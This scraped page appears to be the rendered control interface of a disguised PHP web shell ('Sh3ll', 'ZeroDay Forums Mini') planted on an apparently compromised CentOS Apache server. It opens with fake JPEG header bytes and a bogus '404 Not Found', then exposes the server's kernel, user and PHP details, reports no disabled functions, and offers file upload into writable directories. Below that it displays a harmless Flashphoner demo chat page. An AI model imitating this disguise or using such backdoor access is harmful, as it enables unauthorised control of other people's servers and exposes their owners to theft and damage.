����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/examples/demo/rtmfp-client/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/examples/demo/rtmfp-client/chat.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../dependencies/bootstrap/css/bootstrap.css">
    <title>Chat</title>

    <script type="text/javascript" src="../../../dependencies/jquery/jquery-1.12.0.js"></script>

    <script type="text/javascript" src="../../../dependencies/swf/swfobject.js"></script>

    <!-- Bootstrap -->
    <script src="../../../dependencies/bootstrap/js/bootstrap.min.js"></script>
    <script type="text/javascript">
        function bodyLoaded() {
            var attributes = {};
            var flashvars = {};
            var pathToSWF = "chat/bin/chat.swf";
            var elementId = "flash";
            var params = {};
            var callback = function (e) {
                if (e.success) {
                    setTimeout(function () {
                        var swf = document.getElementById("flash");
                        var url = "rtmfp://" + window.location.hostname + ":" + "1935";
                        swf.setURLtoFlash(url);
                    }, 2000);
                }
            }
            params.menu = "true";
            params.swliveconnect = "true";
            params.allowfullscreen = "true";
            params.allowscriptaccess = "always";
            params.bgcolor = "#777777";
            swfobject.switchOffAutoHideShow();
            swfobject.embedSWF(pathToSWF, elementId, "410", "550", "11.2.202", "expressInstall.swf", flashvars, params, attributes, callback);
        }
    </script>
</head>
<body onload="bodyLoaded()">
    <div class="container">
        <div class="row">
            <div class="col-sm-6 text-center">
                <div id="flash"></div>
            </div>
        </div>
    </div>
</body>

</html>

ZeroDay Forums Mini